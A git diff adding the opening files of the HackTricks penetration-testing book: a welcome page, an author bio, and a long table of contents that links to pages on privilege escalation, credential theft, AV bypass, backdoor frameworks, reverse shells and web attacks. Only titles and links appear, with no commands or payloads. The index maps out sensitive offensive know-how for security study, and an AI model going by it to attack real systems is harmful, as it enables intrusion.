@@ -0,0 +1,24 @@
+# HackTricks
+
+
+
+![](.gitbook/assets/portada-alcoholica.png)
+
+**Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
+
+Here you can find a little **introduction:**
+
+## \*\*\*\*[**Pentesting Methodology**](pentesting-methodology.md)\*\*\*\*
+
+Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**.
+
+**Click in the title to start!**
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+
+
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29.png)
+
+[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
+
diff --git a/SUMMARY.md b/SUMMARY.md
new file mode 100644
index 00000000..6e7c5d66
--- /dev/null
+++ b/SUMMARY.md
@@ -0,0 +1,398 @@
+# Table of contents
+
+* [HackTricks](README.md)
+* [Pentesting Methodology](pentesting-methodology.md)
+* [About the author](about-the-author.md)
+* [Exfiltration](exfiltration.md)
+* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
+* [Brute Force - CheatSheet](brute-force.md)
+* [Search Exploits](search-exploits.md)
+
+## Shells
+
+* [Shells \(Linux, Windows, MSFVenom\)](shells/shells/README.md)
+  * [MSFVenom - CheatSheet](shells/shells/untitled.md)
+  * [Shells - Windows](shells/shells/windows.md)
+  * [Shells - Linux](shells/shells/linux.md)
+
+## Linux/Unix
+
+* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
+* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
+  * [Interesting Groups - Linux PE](linux-unix/privilege-escalation/interesting-groups-linux-pe.md)
+  * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md)
+  * [lxc - Privilege escalation](linux-unix/privilege-escalation/lxd-privilege-escalation.md)
+  * [Escaping from restricted shells - Jails](linux-unix/privilege-escalation/escaping-from-limited-bash.md)
+  * [SSH Forward Agent exploitation](linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md)
+  * [Payloads to execute](linux-unix/privilege-escalation/payloads-to-execute.md)
+  * [Wildcards Spare tricks](linux-unix/privilege-escalation/wildcards-spare-tricks.md)
+* [Useful Linux Commands](linux-unix/useful-linux-commands/README.md)
+  * [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
+* [Linux Environment Variables](linux-unix/linux-environment-variables.md)
+
+## Windows
+
+* [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md)
+* [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md)
+  * [Dll Hijacking](windows/windows-local-privilege-escalation/dll-hijacking.md)
+  * [From High Integrity to SYSTEM with Name Pipes](windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md)
+  * [Named Pipe Client Impersonation](windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md)
+  * [Leaked Handle Exploitation](windows/windows-local-privilege-escalation/leaked-handle-exploitation.md)
+  * [SeDebug + SeImpersonate copy token](windows/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md)
+  * [MSI Wrapper](windows/windows-local-privilege-escalation/msi-wrapper.md)
+  * [JuicyPotato](windows/windows-local-privilege-escalation/juicypotato.md)
+  * [Windows C Payloads](windows/windows-local-privilege-escalation/windows-c-payloads.md)
+  * [PowerUp](windows/windows-local-privilege-escalation/powerup.md)
+  * [JAWS](windows/windows-local-privilege-escalation/jaws.md)
+  * [Seatbelt](windows/windows-local-privilege-escalation/seatbelt.md)
+  * [RottenPotato](windows/windows-local-privilege-escalation/rottenpotato.md)
+* [Active Directory Methodology](windows/active-directory-methodology/README.md)
+  * [Abusing Active Directory ACLs/ACEs](windows/active-directory-methodology/acl-persistence-abuse.md)
+  * [AD information in printers](windows/active-directory-methodology/ad-information-in-printers.md)
+  * [ASREPRoast](windows/active-directory-methodology/asreproast.md)
+  * [BloodHound](windows/active-directory-methodology/bloodhound.md)
+  * [Constrained Delegation](windows/active-directory-methodology/constrained-delegation.md)
+  * [Custom SSP](windows/active-directory-methodology/custom-ssp.md)
+  * [DCShadow](windows/active-directory-methodology/dcshadow.md)
+  * [DCSync](windows/active-directory-methodology/dcsync.md)
+  * [DSRM Credentials](windows/active-directory-methodology/dsrm-credentials.md)
+  * [Golden Ticket](windows/active-directory-methodology/golden-ticket.md)
+  * [Kerberos Authentication](windows/active-directory-methodology/kerberos-authentication.md)
+  * [Kerberoast](windows/active-directory-methodology/kerberoast.md)
+  * [MSSQL Trusted Links](windows/active-directory-methodology/mssql-trusted-links.md)
+  * [Over Pass the Hash/Pass the Key](windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md)
+  * [Pass the Ticket](windows/active-directory-methodology/pass-the-ticket.md)
+  * [Password Spraying](windows/active-directory-methodology/password-spraying.md)
+  * [Printers Spooler Service abuse](windows/active-directory-methodology/printers-spooler-service-abuse.md)
+  * [Privileged Accounts and Token Privileges](windows/active-directory-methodology/privileged-accounts-and-token-privileges.md)
+  * [Resource-based Constrained Delegation](windows/active-directory-methodology/resource-based-constrained-delegation.md)
+  * [Security Descriptors](windows/active-directory-methodology/security-descriptors.md)
+  * [Silver Ticket](windows/active-directory-methodology/silver-ticket.md)
+  * [Skeleton Key](windows/active-directory-methodology/skeleton-key.md)
+  * [Unconstrained Delegation](windows/active-directory-methodology/unconstrained-delegation.md)
+* [NTLM](windows/ntlm/README.md)
+  * [Places to steal NTLM creds](windows/ntlm/places-to-steal-ntlm-creds.md)
+  * [PsExec/Winexec/ScExec](windows/ntlm/psexec-and-winexec.md)
+  * [SmbExec/ScExec](windows/ntlm/smbexec.md)
+  * [WmicExec](windows/ntlm/wmicexec.md)
+  * [AtExec / SchtasksExec](windows/ntlm/atexec.md)
+  * [WinRM](windows/ntlm/winrm.md)
+* [Stealing Credentials](windows/stealing-credentials/README.md)
+  * [Credentials Protections](windows/stealing-credentials/credentials-protections.md)
+  * [Mimikatz](windows/stealing-credentials/credentials-mimikatz.md)
+* [Authentication, Credentials, Token privileges, UAC and EFS](windows/credentials.md)
+* [Basic CMD for Pentesters](windows/basic-cmd-for-pentesters.md)
+* [Basic PowerShell for Pentesters](windows/basic-powershell-for-pentesters/README.md)
+  * [PowerView](windows/basic-powershell-for-pentesters/powerview.md)
+* [AV Bypass](windows/av-bypass.md)
+
+## Mobile Apps Pentesting
+
+* [Android APK Checklist](mobile-apps-pentesting/android-checklist.md)
+* [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md)
+  * [ADB Commands](mobile-apps-pentesting/android-app-pentesting/adb-commands.md)
+  * [APK decompilers](mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md)
+  * [Burp Suite Configuration for Android](mobile-apps-pentesting/android-app-pentesting/android-burp-suite-settings.md)
+  * [Drozer Tutorial](mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md)
+    * [Exploiting Content Providers](mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md)
+  * [Exploiting a debuggeable applciation](mobile-apps-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md)
+  * [Frida Tutorial](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/README.md)
+    * [Frida Tutorial 1](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md)
+    * [Frida Tutorial 2](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md)
+    * [Frida Tutorial 3](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
+    * [Objection Tutorial](mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
+  * [Google CTF 2018 - Shall We Play a Game?](mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
+  * [Manual DeObfuscation](mobile-apps-pentesting/android-app-pentesting/manual-deobfuscation.md)
+  * [Reversing Native Libraries](mobile-apps-pentesting/android-app-pentesting/reversing-native-libraries.md)
+  * [Smali - Decompiling/\[Modifying\]/Compiling](mobile-apps-pentesting/android-app-pentesting/smali-changes.md)
+  * [Spoofing your location in Play Store](mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md)
+  * [Webview Attacks](mobile-apps-pentesting/android-app-pentesting/webview-attacks.md)
+  * [What are Intents](mobile-apps-pentesting/android-app-pentesting/what-are-intents.md)
+
+## Pentesting
+
+* [Pentesting Network](pentesting/pentesting-network/README.md)
+  * [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
+  * [Spoofing SSDP and UPnP Devices with EvilSSDP](pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md)
+  * [Wifi Attacks](pentesting/pentesting-network/wifi-attacks/README.md)
+    * [Evil Twin EAP-TLS](pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md)
+  * [Pentesting IPv6](pentesting/pentesting-network/pentesting-ipv6.md)
+  * [Nmap Summary \(ESP\)](pentesting/pentesting-network/nmap-summary-esp.md)
+  * [Network Protocols Explained \(ESP\)](pentesting/pentesting-network/network-protocols-explained-esp.md)
+  * [IDS and IPS Evasion](pentesting/pentesting-network/ids-evasion.md)
+  * [DHCPv6](pentesting/pentesting-network/dhcpv6.md)
+* [Pentesting JDWP - Java Debug Wire Protocol](pentesting/pentesting-jdwp-java-debug-wire-protocol.md)
+* [Pentesting Printers](pentesting/pentesting-printers/README.md)
+  * [Accounting bypass](pentesting/pentesting-printers/accounting-bypass.md)
+  * [Buffer Overflows](pentesting/pentesting-printers/buffer-overflows.md)
+  * [Credentials Disclosure / Brute-Force](pentesting/pentesting-printers/credentials-disclosure-brute-force.md)
+  * [Cross-Site Printing](pentesting/pentesting-printers/cross-site-printing.md)
+  * [Document Processing](pentesting/pentesting-printers/document-processing.md)
+  * [Factory Defaults](pentesting/pentesting-printers/factory-defaults.md)
+  * [File system access](pentesting/pentesting-printers/file-system-access.md)
+  * [Firmware updates](pentesting/pentesting-printers/firmware-updates.md)
+  * [Memory Access](pentesting/pentesting-printers/memory-access.md)
+  * [Physical Damage](pentesting/pentesting-printers/physical-damage.md)
+  * [Software packages](pentesting/pentesting-printers/software-packages.md)
+  * [Transmission channel](pentesting/pentesting-printers/transmission-channel.md)
+  * [Print job manipulation](pentesting/pentesting-printers/print-job-manipulation.md)
+  * [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md)
+  * [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md)
+* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md)
+* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md)
+  * [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md)
+  * [FTP Bounce - Download 2ºFTP file](pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md)
+* [22 - Pentesting SSH/SFTP](pentesting/pentesting-ssh.md)
+* [23 - Pentesting Telnet](pentesting/pentesting-telnet.md)
+* [25,465,587 - Pentesting SMTP/s](pentesting/pentesting-smtp/README.md)
+  * [SMTP - Commands](pentesting/pentesting-smtp/smtp-commands.md)
+* [43 - Pentesting WHOIS](pentesting/43-pentesting-whois.md)
+* [53 - Pentesting DNS](pentesting/pentesting-dns.md)
+* [69/UDP TFTP/Bittorrent-tracker](pentesting/69-udp-tftp.md)
+* [79 - Pentesting Finger](pentesting/pentesting-finger.md)
+* [80,443 - Pentesting Web Methodology](pentesting/pentesting-web/README.md)
+  * [Apache](pentesting/pentesting-web/apache.md)
+  * [JSP](pentesting/pentesting-web/jsp.md)
+  * [API Pentesting](pentesting/pentesting-web/api-pentesting.md)
+  * [Buckets](pentesting/pentesting-web/buckets/README.md)
+    * [Firebase Database](pentesting/pentesting-web/buckets/firebase-database.md)
+    * [AWS-S3](pentesting/pentesting-web/buckets/aws-s3.md)
+  * [CGI](pentesting/pentesting-web/cgi.md)
+  * [Drupal](pentesting/pentesting-web/drupal.md)
+  * [Flask](pentesting/pentesting-web/flask.md)
+  * [Git](pentesting/pentesting-web/git.md)
+  * [GraphQL](pentesting/pentesting-web/graphql.md)
+  * [H2 - Java SQL database](pentesting/pentesting-web/h2-java-sql-database.md)
+  * [IIS - Internet Information Services](pentesting/pentesting-web/iis-internet-information-services.md)
+  * [JBOSS](pentesting/pentesting-web/jboss.md)
+  * [Jenkins](pentesting/pentesting-web/jenkins.md)
+  * [JIRA](pentesting/pentesting-web/jira.md)
+  * [Joomla](pentesting/pentesting-web/joomla.md)
+  * [Nginx](pentesting/pentesting-web/nginx.md)
+  * [PHP Tricks \(SPA\)](pentesting/pentesting-web/php-tricks-esp/README.md)
+    * [PHP - Useful Functions \(disabled bypass\)](pentesting/pentesting-web/php-tricks-esp/php-useful-functions.md)
+  * [Python](pentesting/pentesting-web/python.md)
+  * [Tomcat](pentesting/pentesting-web/tomcat.md)
+  * [VMWare \(ESX, VCenter...\)](pentesting/pentesting-web/vmware-esx-vcenter....md)
+  * [WebDav](pentesting/pentesting-web/put-method-webdav.md)
+  * [Wordpress](pentesting/pentesting-web/wordpress.md)
+* [88tcp/udp - Pentesting Kerberos](pentesting/pentesting-kerberos-88/README.md)
+  * [Harvesting tickets from Windows](pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
+  * [Harvesting tickets from Linux](pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
+* [110,995 - Pentesting POP](pentesting/pentesting-pop.md)
+* [111/TCP/UDP - Pentesting Portmapper](pentesting/pentesting-rpcbind.md)
+* [113 - Pentesting Ident](pentesting/113-pentesting-ident.md)
+* [123/udp - Pentesting NTP](pentesting/pentesting-ntp.md)
+* [135, 593 - Penstesting MSRPC](pentesting/135-penstesting-msrpc.md)
+* [137,138,139 - Pentesting NetBios](pentesting/137-138-139-pentesting-netbios.md)
+* [139,445 - Pentesting SMB](pentesting/pentesting-smb.md)
+* [143,993 - Pentesting IMAP](pentesting/pentesting-imap.md)
+* [161,162,10161,10162/udp - Pentesting SNMP](pentesting/pentesting-snmp.md)
+* [194,6667,6660-7000 - Pentesting IRC](pentesting/pentesting-irc.md)
+* [264 - Pentesting Check Point FireWall-1](pentesting/pentesting-264-check-point-firewall-1.md)
+* [389, 636, 3268, 3269 - Pentesting LDAP](pentesting/pentesting-ldap.md)
+* [500/udp - Pentesting IPsec/IKE VPN](pentesting/ipsec-ike-vpn-pentesting.md)
+* [502 - Pentesting Modbus](pentesting/pentesting-modbus.md)
+* [512 - Pentesting Rexec](pentesting/512-pentesting-rexec.md)
+* [513 - Pentesting Rlogin](pentesting/pentesting-rlogin.md)
+* [514 - Pentesting Rsh](pentesting/pentesting-rsh.md)
+* [515 - Pentesting Line Printer Daemon \(LPD\)](pentesting/515-pentesting-line-printer-daemon-lpd.md)
+* [548 - Pentesting Apple Filing Protocol \(AFP\)](pentesting/584-pentesting-afp.md)
+* [554,8554 - Pentesting RTSP](pentesting/554-8554-pentesting-rtsp.md)
+* [623/UDP/TCP - IPMI](pentesting/623-udp-ipmi.md)
+* [631 - Internet Printing Protocol\(IPP\)](pentesting/pentesting-631-internet-printing-protocol-ipp.md)
+* [873 - Pentesting Rsync](pentesting/873-pentesting-rsync.md)
+* [1026 - Pentesting Rusersd](pentesting/1026-pentesting-rusersd.md)
+* [1098/1099 - Pentesting Java RMI](pentesting/1099-pentesting-java-rmi.md)
+* [1433 - Pentesting MSSQL - Microsoft SQL Server](pentesting/pentesting-mssql-microsoft-sql-server.md)
+* [1521,1522-1529 - Pentesting Oracle TNS Listener](pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
+  * [Oracle Pentesting requirements installation](pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
+  * [TNS Poison](pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md)
+  * [Remote stealth pass brute force](pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md)
+  * [Oracle RCE & more](pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md)
+* [1723 - Pentesting PPTP](pentesting/1723-pentesting-pptp.md)
+* [1883 - Pentesting MQTT \(Mosquitto\)](pentesting/1883-pentesting-mqtt-mosquitto.md)
+* [2049 - Pentesting NFS Service](pentesting/nfs-service-pentesting.md)
+* [2301,2381 - Pentesting Compaq/HP Insight Manager](pentesting/pentesting-compaq-hp-insight-manager.md)
+* [3260 - Pentesting ISCSI](pentesting/3260-pentesting-iscsi.md)
+* [3299 - Pentesting SAPRouter](pentesting/3299-pentesting-saprouter.md)
+* [3306 - Pentesting Mysql](pentesting/pentesting-mysql.md)
+* [3389 - Pentesting RDP](pentesting/pentesting-rdp.md)
+* [3632 - Pentesting distcc](pentesting/3632-pentesting-distcc.md)
+* [4369 - Pentesting Erlang Port Mapper Daemon \(epmd\)](pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md)
+* [5353/UDP Multicast DNS \(mDNS\)](pentesting/5353-udp-multicast-dns-mdns.md)
+* [5432,5433 - Pentesting Postgresql](pentesting/pentesting-postgresql.md)
+* [5671,5672 - Pentesting AMQP](pentesting/5671-5672-pentesting-amqp.md)
+* [5800,5801,5900,5901 - Pentesting VNC](pentesting/pentesting-vnc.md)
+* [5984 - Pentesting CouchDB](pentesting/5984-pentesting-couchdb.md)
+* [5985,5986 - Pentesting WinRM](pentesting/5985-5986-pentesting-winrm.md)
+* [6000 - Pentesting X11](pentesting/6000-pentesting-x11.md)
+* [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
+* [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)
+* [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md)
+* [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md)
+* [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md)
+* [10000 - Pentesting Network Data Management Protocol \(ndmp\)](pentesting/10000-network-data-management-protocol-ndmp.md)
+* [11211 - Pentesting Memcache](pentesting/11211-memcache.md)
+* [15672 - Pentesting RabbitMQ Management](pentesting/15672-pentesting-rabbitmq-management.md)
+* [27017,27018 - Pentesting MongoDB](pentesting/27017-27018-mongodb.md)
+* [44818/UDP/TCP - Pentesting EthernetIP](pentesting/44818-ethernetip.md)
+* [47808/udp - Pentesting BACNet](pentesting/47808-udp-bacnet.md)
+* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
+
+## Pentesting Web
+
+* [2FA Bypass](pentesting-web/2fa-bypass.md)
+* [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
+* [Captcha Bypass](pentesting-web/captcha-bypass.md)
+* [Cache Poisoning and Cache Deception](pentesting-web/cache-deception.md)
+* [Clickjacking](pentesting-web/clickjacking.md)
+* [Client Side Template Injection \(CSTI\)](pentesting-web/client-side-template-injection-csti.md)
+* [Command Injection](pentesting-web/command-injection.md)
+* [Content Security Policy \(CSP\) Bypass](pentesting-web/content-security-policy-csp-bypass.md)
+* [Cookies Hacking](pentesting-web/hacking-with-cookies.md)
+* [CORS - Misconfigurations & Bypass](pentesting-web/cors-bypass.md)
+* [CRLF \(%0D%0A\) Injection](pentesting-web/crlf-0d-0a.md)
+* [Cross-site WebSocket hijacking \(CSWSH\)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
+* [CSRF \(Cross Site Request Forgery\)](pentesting-web/csrf-cross-site-request-forgery.md)
+* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md)
+* [Deserialization](pentesting-web/deserialization/README.md)
+  * [NodeJS deserialization \_\_proto\_\_ abuse](pentesting-web/deserialization/nodejs-deserialization-__proto__-abuse.md)
+  * [Java JSF ViewState \(.faces\) Deserialization](pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md)
+  * [Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner](pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md)
+  * [Basic Java Deserialization \(ObjectInputStream, readObject\)](pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md)
+  * [CommonsCollection1 Payload - Java Transformers to Rutime exec\(\) and Thread Sleep](pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md)
+  * [Basic .Net deserialization \(ObjectDataProvider gadget, ExpandedWrapper, and Json.Net\)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md)
+  * [Exploiting \_\_VIEWSTATE parameter](pentesting-web/deserialization/exploiting-__viewstate-parameter.md)
+* [Email Header Injection](pentesting-web/email-header-injection.md)
+* [File Inclusion/Path traversal](pentesting-web/file-inclusion.md)
+* [File Upload](pentesting-web/file-upload.md)
+* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling.md)
+* [IDOR](pentesting-web/idor.md)
+* [JWT Vulnerabilities \(Json Web Tokens\)](pentesting-web/hacking-jwt-json-web-tokens.md)
+* [NoSQL injection](pentesting-web/nosql-injection.md)
+* [LDAP Injection](pentesting-web/ldap-injection.md)
+* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
+* [Open Redirect](pentesting-web/open-redirect.md)
+* [Race Condition](pentesting-web/race-condition.md)
+* [Rate Limit Bypass](pentesting-web/rate-limit-bypass.md)
+* [SQL Injection](pentesting-web/sql-injection/README.md)
+  * [MSSQL Injection](pentesting-web/sql-injection/mssql-injection.md)
+  * [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
+  * [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
+    * [dblink/lo\_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md)
+    * [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
+    * [Network - Privesc, Port Scanner and NTLM chanllenge response disclosure](pentesting-web/sql-injection/postgresql-injection/network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)
+    * [Big Binary Files Upload \(PostgreSQL\)](pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md)
+    * [RCE with PostgreSQL Extensions](pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
+  * [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
+    * [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
+  * [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap.md)
+* [SSRF \(Server Side Request Forgery\)](pentesting-web/ssrf-server-side-request-forgery.md)
+* [SSTI \(Server Side Template Injection\)](pentesting-web/ssti-server-side-template-injection.md)
+* [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
+* [Unicode Normalization vulnerability](pentesting-web/unicode-normalization-vulnerability.md)
+* [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md)
+* [XPATH injection](pentesting-web/xpath-injection.md)
+* [XSLT Server Side Injection \(Extensible Stylesheet Languaje Transformations\)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
+* [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
+* [XSS \(Cross Site Scripting\)](pentesting-web/xss-cross-site-scripting/README.md)
+  * [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
+  * [Server Side XSS \(Dynamic PDF\)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
+  * [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
+* [XSSI \(Cross-Site Script Inclusion\)](pentesting-web/xssi-cross-site-script-inclusion.md)
+* [XS-Search](pentesting-web/xs-search.md)
+
+## Physical attacks
+
+* [Physical Attacks](physical-attacks/physical-attacks.md)
+* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
+  * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
+
+## Exploiting
+
+* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
+  * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
+  * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
+  * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
+  * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
+  * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
+* [Exploiting Tools](exploiting/tools/README.md)
+  * [PwnTools](exploiting/tools/pwntools.md)
+* [Windows Exploiting \(Basic Guide - OSCP lvl\)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
+* [Reversing](exploiting/reversing.md)
+
+## Forensics
+
+* [Malware Analysis](forensics/malware-analysis.md)
+* [Memory dump analysis](forensics/memory-dump-analysis.md)
+* [Pcaps analysis](forensics/pcaps-analysis/README.md)
+  * [USB Keyboard pcap analysis](forensics/pcaps-analysis/usb-keyboard-pcap-analysis.md)
+  * [DNSCat pcap analysis](forensics/pcaps-analysis/dnscat-exfiltration.md)
+  * [WireShark tricks](forensics/pcaps-analysis/wireshark-tricks.md)
+* [Volatility - Examples](forensics/volatility-examples.md)
+* [Basic Forensics \(ESP\)](forensics/basic-forensics-esp/README.md)
+  * [USB logs analysis](forensics/basic-forensics-esp/usb-logs-analysis.md)
+  * [Desofuscation vbs \(cscript.exe\)](forensics/basic-forensics-esp/desofuscation-vbs-cscript.exe.md)
+  * [.pyc](forensics/basic-forensics-esp/.pyc.md)
+  * [Office file analysis](forensics/basic-forensics-esp/office-file-analysis.md)
+  * [Video and Audio file analysis](forensics/basic-forensics-esp/video-and-audio-file-analysis.md)
+  * [PDF File analysis](forensics/basic-forensics-esp/pdf-file-analysis.md)
+  * [File System Analysis](forensics/basic-forensics-esp/file-system-analysis.md)
+  * [PNG tricks](forensics/basic-forensics-esp/png-tricks.md)
+  * [ZIPs tricks](forensics/basic-forensics-esp/zips-tricks.md)
+
+## Crypto
+
+* [Electronic Code Book \(ECB\)](crypto/electronic-code-book-ecb.md)
+* [Cipher Block Chaining CBC-MAC](crypto/cipher-block-chaining-cbc-mac-priv.md)
+* [Padding Oracle](crypto/padding-oracle-priv.md)
+* [RC4 - Encrypt&Decrypt](crypto/rc4-encrypt-and-decrypt.md)
+* [Crypto CTFs Tricks](crypto/crypto-ctfs-tricks.md)
+
+## BACKDOORS
+
+* [Merlin](backdoors/merlin.md)
+* [Empire](backdoors/empire.md)
+* [Salseo](backdoors/salseo.md)
+* [ICMPsh](backdoors/icmpsh.md)
+
+## Stego
+
+* [Stego Tricks](stego/stego-tricks.md)
+* [Esoteric languages](stego/esoteric-languages.md)
+
+## MISC
+
+* [Basic Python](misc/basic-python/README.md)
+  * [Bypass Python sandboxes](misc/basic-python/bypass-python-sandboxes.md)
+  * [Magic Methods](misc/basic-python/magic-methods.md)
+  * [Web Requests](misc/basic-python/web-requests.md)
+  * [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md)
+  * [ROP-PWN template](misc/basic-python/rop-pwn-template.md)
+* [Other Big References](misc/references.md)
+
+## TODO
+
+* [More Tools](todo/more-tools.md)
+* [MISC](todo/misc.md)
+* [Pentesting DNS](todo/pentesting-dns.md)
+
+---
+
+* [Burp Suite](burp-suite.md)
+* [Other Web Tricks](other-web-tricks.md)
+* [Interesting HTTP](interesting-http.md)
+* [Emails Vulnerabilities](emails-vulns.md)
+* [Bug Bounties Methodology](bug-bounties-methodology.md)
+* [Cloud security review](cloud-security-review.md)
+* [Android Forensics](android-forensics.md)
+* [TR-069](tr-069.md)
+* [6881/udp - Pentesting BitTorrent](6881-udp-pentesting-bittorrent.md)
+* [CTF Write-ups](ctf-write-ups/README.md)
+  * [Try Hack Me](ctf-write-ups/try-hack-me/README.md)
+    * [hc0n Christmas CTF - 2019](ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md)
+    * [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md)
+* [1911 - Pentesting fox](1911-pentesting-fox.md)
+* [Online Platforms with API](online-platforms-with-api.md)
+
diff --git a/about-the-author.md b/about-the-author.md
new file mode 100644
index 00000000..ba78e966
--- /dev/null
+++ b/about-the-author.md
@@ -0,0 +1,31 @@
+# About the author
+
+### Hello!!
+
+This is **Carlos Polop**.
+
+First of all, I want to indicate that **I don't own this entire book**, a lot of **information was copy/pasted from other websites and that content belongs to them** \(this is indicated on the copy/pasted content\).
+
+I also wants to say **thanks to all the people that share cyber-security related information for free** on the Internet. Thanks to them I learnt hacking and thanks to them HackTricks is possible.
+
+### BIO
+
+If for some weird reason you are interested in knowing about my bio here you have a summary:
+
+* I've worked in different companies as sysadmin, developer and **pentester** \(which is my current role\).
+* I'm a **Telecommunications Engineer** with a **Masters** in **Cybersecurity**
+* Relevant certifications: **OSCP, OSWE**, **CRTP** \(Certified Red Team Professional\) and Professional Drone pilot.
+* I speak **Spanish** and **English** and little of French \(some day I will improve that\).
+* I'm a **CTF player**
